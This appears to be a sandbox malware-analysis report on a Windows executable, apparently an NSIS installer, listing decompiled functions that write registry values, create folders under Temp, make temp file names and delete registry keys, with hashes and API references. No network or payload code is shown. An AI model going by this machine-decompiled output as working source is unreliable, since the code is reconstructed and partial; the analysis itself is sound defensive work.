                                  control_flow_graph 953 40231a-402360 call 402afc call 402a07 * 2 RegCreateKeyExA 960 402366-40236e 953->960 961 40289c-4028ab 953->961 962 402370-40237d call 402a07 lstrlenA 960->962 963 40237e-402381 960->963 962->963 966 402391-402394 963->966 967 402383-402390 call 4029ea 963->967 971 4023a5-4023b9 RegSetValueExA 966->971 972 402396-4023a0 call 402e6c 966->972 967->966 975 4023bb 971->975 976 4023be-402494 RegCloseKey 971->976 972->971 975->976 976->961 978 40266d-402674 976->978 978->961
                                  C-Code - Quality: 85%
                                  			E0040231A(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				long _t22;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AFC(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x2c) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E00402A07(2);
				_t18 = E00402A07(0x11);
				_t30 =  *0x42ec50; // 0x100
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27); // executed
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A07(0x23);
						_t19 = lstrlenA(0x40a3c0) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029EA(3);
						 *0x40a3c0 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E6C( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a3c0, 0xc00); // executed
					}
					_t22 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x2c), 0x40a3c0, _t19); // executed
					if(_t22 == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42ec28 =  *0x42ec28 +  *(_t37 - 4);
				return 0;
			}












                                  0x0040231b
                                  0x00402320
                                  0x0040232a
                                  0x00402334
                                  0x00402337
                                  0x00402341
                                  0x00402351
                                  0x00402358
                                  0x00402360
                                  0x0040236e
                                  0x00402372
                                  0x0040237d
                                  0x0040237d
                                  0x00402381
                                  0x00402385
                                  0x0040238b
                                  0x00402390
                                  0x00402390
                                  0x00402394
                                  0x004023a0
                                  0x004023a0
                                  0x004023b1
                                  0x004023b9
                                  0x004023bb
                                  0x004023bb
                                  0x004023be
                                  0x0040248e
                                  0x0040248e
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 00402358
                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsuD883.tmp,00000023,?,?,?,00000100,?,?,?,00000011,00000002), ref: 00402378
                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsuD883.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 004023B1
                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsuD883.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040248E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CloseCreateValuelstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsuD883.tmp
                                  • API String ID: 1356686001-1098077770
                                  • Opcode ID: c29f00ab0f4ef0538f62de4efe8d22b9426922cd8dc70cd59bd6115dca28b313
                                  • Instruction ID: b27c2e8e59d72643b8274eff82bc1ff1b80250702ef6c9dc6295bb4b4b5c6925
                                  • Opcode Fuzzy Hash: c29f00ab0f4ef0538f62de4efe8d22b9426922cd8dc70cd59bd6115dca28b313
                                  • Instruction Fuzzy Hash: 8C116071E00108BEEB10EBB5CE8AEAF7678EB44358F10443AF905B61D0D6B86D019B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 979 4015b3-4015c6 call 402a07 call 4056de 984 4015c8-4015e3 call 405670 CreateDirectoryA 979->984 985 40160a-40160d 979->985 992 401600-401608 984->992 993 4015e5-4015f0 GetLastError 984->993 987 401638-40217f call 401423 985->987 988 40160f-40162a call 401423 call 405b98 SetCurrentDirectoryA 985->988 1000 40289c-4028ab 987->1000 1001 40266d-402674 987->1001 988->1000 1004 401630-401633 988->1004 992->984 992->985 996 4015f2-4015fb GetFileAttributesA 993->996 997 4015fd 993->997 996->992 996->997 997->992 1001->1000 1004->1000
                                  C-Code - Quality: 85%
                                  			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t12;
				int _t18;
				int _t21;
				struct _SECURITY_ATTRIBUTES* _t22;
				signed char _t24;
				struct _SECURITY_ATTRIBUTES* _t25;
				CHAR* _t27;
				struct _SECURITY_ATTRIBUTES** _t31;
				void* _t32;

				_t25 = __ebx;
				_t27 = E00402A07(0xfffffff0);
				_t12 = E004056DE(_t27);
				_t29 = _t12;
				if(_t12 != __ebx) {
					do {
						_t31 = E00405670(_t29, 0x5c);
						 *_t31 = _t25;
						 *((char*)(_t32 + 0xb)) =  *_t31;
						_t21 = CreateDirectoryA(_t27, _t25); // executed
						if(_t21 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t32 - 4)) =  *((intOrPtr*)(_t32 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t27); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t22 =  *((intOrPtr*)(_t32 + 0xb));
						 *_t31 = _t22;
						_t29 =  &(_t31[0]);
					} while (_t22 != _t25);
				}
				if( *((intOrPtr*)(_t32 - 0x20)) == _t25) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B98("C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter\\cavil\\Ablativers91", _t27);
					_t18 = SetCurrentDirectoryA(_t27); // executed
					if(_t18 == 0) {
						 *((intOrPtr*)(_t32 - 4)) =  *((intOrPtr*)(_t32 - 4)) + 1;
					}
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t32 - 4));
				return 0;
			}












                                  0x004015b3
                                  0x004015ba
                                  0x004015bd
                                  0x004015c2
                                  0x004015c6
                                  0x004015c8
                                  0x004015d0
                                  0x004015d6
                                  0x004015d8
                                  0x004015db
                                  0x004015e3
                                  0x004015f0
                                  0x004015fd
                                  0x004015fd
                                  0x004015f2
                                  0x004015f3
                                  0x004015fb
                                  0x00000000
                                  0x00000000
                                  0x004015fb
                                  0x004015f0
                                  0x00401600
                                  0x00401603
                                  0x00401605
                                  0x00401606
                                  0x004015c8
                                  0x0040160d
                                  0x00401638
                                  0x0040217a
                                  0x0040160f
                                  0x00401611
                                  0x0040161c
                                  0x00401622
                                  0x0040162a
                                  0x00401630
                                  0x00401630
                                  0x0040162a
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                    • Part of subcall function 004056DE: CharNextA.USER32(?,?,Resolver.Sel,?,0040574A,Resolver.Sel,Resolver.Sel,?,?,74D0FA90,00405495,?,C:\Users\user\AppData\Local\Temp\,74D0FA90,00000000), ref: 004056EC
                                    • Part of subcall function 004056DE: CharNextA.USER32(00000000), ref: 004056F1
                                    • Part of subcall function 004056DE: CharNextA.USER32(00000000), ref: 00405705
                                  • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                  • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91,00000000,00000000,000000F0), ref: 00401622
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91, xrefs: 00401617
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                  • String ID: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91
                                  • API String ID: 3751793516-3958623274
                                  • Opcode ID: b485256cae0e4eabec218592452bde1411ee252b96ffd45204502214cc4f2ee5
                                  • Instruction ID: ee19d1f973d54ef8b99b3b54f6c062267f549ed0b0d588b48896c2ad5940add3
                                  • Opcode Fuzzy Hash: b485256cae0e4eabec218592452bde1411ee252b96ffd45204502214cc4f2ee5
                                  • Instruction Fuzzy Hash: 42112532908150ABDB212F755D04EAF77B4AA66366724073BF491B62E2C63D1D428A2E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405875 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1006 405875-40587f 1007 405880-4058ab GetTickCount GetTempFileNameA 1006->1007 1008 4058ba-4058bc 1007->1008 1009 4058ad-4058af 1007->1009 1010 4058b4-4058b7 1008->1010 1009->1007 1011 4058b1 1009->1011 1011->1010
                                  C-Code - Quality: 100%
                                  			E00405875(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x409368; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                  0x00405879
                                  0x0040587f
                                  0x00405880
                                  0x00405880
                                  0x00405885
                                  0x00405886
                                  0x00405889
                                  0x00405893
                                  0x004058a0
                                  0x004058a3
                                  0x004058ab
                                  0x00000000
                                  0x00000000
                                  0x004058af
                                  0x00000000
                                  0x00000000
                                  0x004058b1
                                  0x00000000
                                  0x004058b1
                                  0x00000000

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00405889
                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004058A3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CountFileNameTempTick
                                  • String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                  • API String ID: 1716503409-1894475642
                                  • Opcode ID: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                  • Instruction ID: 1dda5c804d7827273bb1028780a4a64484350cceb0838572b068d11ab2f99610
                                  • Opcode Fuzzy Hash: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                  • Instruction Fuzzy Hash: 44F0E2333082046BEB009F16DC04B9B7B9DDF91760F00C037FD04DA180D2B098548B59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402A47 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1012 402a47-402a70 RegOpenKeyExA 1013 402a72-402a7d 1012->1013 1014 402adb-402adf 1012->1014 1015 402a98-402aa8 RegEnumKeyA 1013->1015 1016 402aaa-402abc RegCloseKey call 405ec3 1015->1016 1017 402a7f-402a82 1015->1017 1025 402ae2-402ae8 1016->1025 1026 402abe-402acd 1016->1026 1019 402a84-402a96 call 402a47 1017->1019 1020 402acf-402ad2 RegCloseKey 1017->1020 1019->1015 1019->1016 1023 402ad8-402ada 1020->1023 1023->1014 1025->1023 1027 402aea-402af8 RegDeleteKeyA 1025->1027 1026->1014 1027->1023 1029 402afa 1027->1029 1029->1014
                                  C-Code - Quality: 84%
                                  			E00402A47(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ec50; // 0x100
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8); // executed
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A47(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405EC3(2);
					if(_t27 == 0) {
						__eflags =  *0x42ec50; // 0x100
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ec50, 0);
				}
				return _t18;
			}










                                  0x00402a57
                                  0x00402a68
                                  0x00402a70
                                  0x00402a98
                                  0x00402a7f
                                  0x00402a82
                                  0x00402ad2
                                  0x00402ad8
                                  0x00402ada
                                  0x00000000
                                  0x00402ada
                                  0x00402a8f
                                  0x00402a94
                                  0x00402a96
                                  0x00000000
                                  0x00000000
                                  0x00402a96
                                  0x00402aad
                                  0x00402ab5
                                  0x00402abc
                                  0x00402ae2
                                  0x00402ae8
                                  0x00000000
                                  0x00000000
                                  0x00402af0
                                  0x00402af6
                                  0x00402af8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402af8
                                  0x00000000
                                  0x00402acb
                                  0x00402adf

                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000100,?), ref: 00402A68
                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA4
                                  • RegCloseKey.ADVAPI32(?), ref: 00402AAD
                                  • RegCloseKey.ADVAPI32(?), ref: 00402AD2
                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Close$DeleteEnumOpen
                                  • String ID:
                                  • API String ID: 1912718029-0
                                  • Opcode ID: 84196d7f5fc02fe5ab8711ceac2d863dfcc787af46e28da4b55052b4393e713e
                                  • Instruction ID: 65caa8dba947dc35e866d31b7f01948ae96153933ca281d28be61e62e6d6ab53
                                  • Opcode Fuzzy Hash: 84196d7f5fc02fe5ab8711ceac2d863dfcc787af46e28da4b55052b4393e713e
                                  • Instruction Fuzzy Hash: C9116D31600108BFDF219F91DE49EAB3B7DEB04358B104436FA05F00A0DBB48E529F69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 100016DA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1030 100016da-10001716 call 10001a86 1034 10001827-10001829 1030->1034 1035 1000171c-10001720 1030->1035 1036 10001722-10001728 call 10002165 1035->1036 1037 10001729-10001736 call 100021af 1035->1037 1036->1037 1042 10001766-1000176d 1037->1042 1043 10001738-1000173d 1037->1043 1044 1000178d-10001791 1042->1044 1045 1000176f-1000178b call 1000236d call 10001576 call 10001278 GlobalFree 1042->1045 1046 10001758-1000175b 1043->1046 1047 1000173f-10001740 1043->1047 1052 10001793-100017cd call 10001576 call 1000236d 1044->1052 1053 100017cf-100017d5 call 1000236d 1044->1053 1069 100017d6-100017da 1045->1069 1046->1042 1048 1000175d-1000175e call 10002a57 1046->1048 1050 10001742-10001743 1047->1050 1051 10001748-10001749 call 1000279c 1047->1051 1062 10001763 1048->1062 1057 10001750-10001756 call 10002540 1050->1057 1058 10001745-10001746 1050->1058 1065 1000174e 1051->1065 1052->1069 1053->1069 1068 10001765 1057->1068 1058->1042 1058->1051 1062->1068 1065->1062 1068->1042 1073 10001817-1000181e 1069->1073 1074 100017dc-100017ea call 10002333 1069->1074 1073->1034 1076 10001820-10001821 GlobalFree 1073->1076 1080 10001802-10001809 1074->1080 1081 100017ec-100017ef 1074->1081 1076->1034 1080->1073 1083 1000180b-10001816 call 100014ff 1080->1083 1081->1080 1082 100017f1-100017f9 1081->1082 1082->1080 1084 100017fb-100017fc FreeLibrary 1082->1084 1083->1073 1084->1080
                                  C-Code - Quality: 89%
                                  			E100016DA(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001573);
				_push(1); // executed
				_t34 = E10001A86(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002165(_t50);
					}
					E100021AF(_t65, _t50);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_push(_t50);
								_t34 = E1000236D(_t65);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x818; // 0x818
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E10001576(_t50);
								_t15 = _t50 + 0x818; // 0x818
								_t70 = _t15;
								_push(_t50);
								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
								 *_t70 = 3;
								E1000236D(_t65);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							_push(_t50);
							E1000236D(_t65);
							_t34 = GlobalFree(E10001278(E10001576(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E10002333(_t50);
							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x808);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
								_t34 = E100014FF( *0x10004058);
							}
						}
						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002A57(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000279C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002540(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

















                                  0x100016da
                                  0x100016da
                                  0x100016da
                                  0x100016e4
                                  0x100016ec
                                  0x100016f9
                                  0x10001707
                                  0x1000170a
                                  0x1000170c
                                  0x10001711
                                  0x10001716
                                  0x10001829
                                  0x10001829
                                  0x1000171c
                                  0x10001720
                                  0x10001723
                                  0x10001728
                                  0x1000172a
                                  0x10001730
                                  0x10001736
                                  0x10001766
                                  0x1000176d
                                  0x10001791
                                  0x100017cf
                                  0x100017d0
                                  0x10001793
                                  0x10001793
                                  0x10001794
                                  0x10001797
                                  0x1000179d
                                  0x100017a1
                                  0x100017a4
                                  0x100017a9
                                  0x100017a9
                                  0x100017af
                                  0x100017b0
                                  0x100017b6
                                  0x100017bc
                                  0x100017c8
                                  0x100017c9
                                  0x100017cc
                                  0x1000176f
                                  0x1000176f
                                  0x10001770
                                  0x10001785
                                  0x10001785
                                  0x100017da
                                  0x100017dd
                                  0x100017ea
                                  0x100017f1
                                  0x100017f9
                                  0x100017fc
                                  0x100017fc
                                  0x100017f9
                                  0x10001809
                                  0x10001811
                                  0x10001816
                                  0x10001809
                                  0x1000181e
                                  0x00000000
                                  0x10001820
                                  0x00000000
                                  0x10001821
                                  0x1000181e
                                  0x1000173a
                                  0x1000173d
                                  0x1000175b
                                  0x00000000
                                  0x00000000
                                  0x1000175e
                                  0x10001763
                                  0x10001763
                                  0x10001765
                                  0x00000000
                                  0x10001765
                                  0x1000173f
                                  0x10001740
                                  0x10001748
                                  0x10001749
                                  0x00000000
                                  0x10001749
                                  0x10001742
                                  0x10001743
                                  0x10001751
                                  0x00000000
                                  0x10001751
                                  0x10001746
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x10001746

                                  APIs
                                    • Part of subcall function 10001A86: GlobalFree.KERNEL32 ref: 10001CCE
                                    • Part of subcall function 10001A86: GlobalFree.KERNEL32 ref: 10001CD3
                                    • Part of subcall function 10001A86: GlobalFree.KERNEL32 ref: 10001CD8
                                  • GlobalFree.KERNEL32 ref: 10001785
                                  • FreeLibrary.KERNEL32(?), ref: 100017FC
                                  • GlobalFree.KERNEL32 ref: 10001821
                                    • Part of subcall function 10002165: GlobalAlloc.KERNEL32(00000040,8A470175), ref: 10002197
                                    • Part of subcall function 10002540: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 100025B2
                                    • Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,10004010,00000000,100016B2,00000000), ref: 1000158F
                                    • Part of subcall function 1000236D: wsprintfA.USER32 ref: 100023D2
                                    • Part of subcall function 1000236D: GlobalFree.KERNEL32 ref: 1000248E
                                    • Part of subcall function 1000236D: GlobalFree.KERNEL32 ref: 100024B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                  • String ID:
                                  • API String ID: 1767494692-3916222277
                                  • Opcode ID: 69ff26e15bd1d134cfd18c4da18543aa1d4c3e31032a7704be2a755bcfa9ddd4
                                  • Instruction ID: a4822a2f56843d2abdfa94b6917cafe90cab4d4c428c41a0756c8854a89f2b82
                                  • Opcode Fuzzy Hash: 69ff26e15bd1d134cfd18c4da18543aa1d4c3e31032a7704be2a755bcfa9ddd4
                                  • Instruction Fuzzy Hash: 3131AD759046059AFB41EF249CC9BDA37ECFF052D0F00C029FA09AA09EDF7499458BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404E19 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E00404E19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t9;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a00c != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a00c = _t16;
							E004047F0();
						}
						L11:
						_t9 = CallWindowProcA( *0x42a014, _a4, _t15, _a12, _t16); // executed
						return _t9;
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404770(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403EF4(0x413);
				return 0;
			}






                                  0x00404e1d
                                  0x00404e27
                                  0x00404e43
                                  0x00404e65
                                  0x00404e68
                                  0x00404e6e
                                  0x00404e78
                                  0x00404e79
                                  0x00404e7b
                                  0x00404e81
                                  0x00404e81
                                  0x00404e8b
                                  0x00404e99
                                  0x00000000
                                  0x00404e99
                                  0x00404e50
                                  0x00404e88
                                  0x00404e88
                                  0x00000000
                                  0x00404e88
                                  0x00404e5c
                                  0x00404e5e
                                  0x00000000
                                  0x00404e5e
                                  0x00404e2d
                                  0x00000000
                                  0x00000000
                                  0x00404e34
                                  0x00000000

                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 00404E48
                                  • CallWindowProcA.USER32 ref: 00404E99
                                    • Part of subcall function 00403EF4: SendMessageA.USER32 ref: 00403F06
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
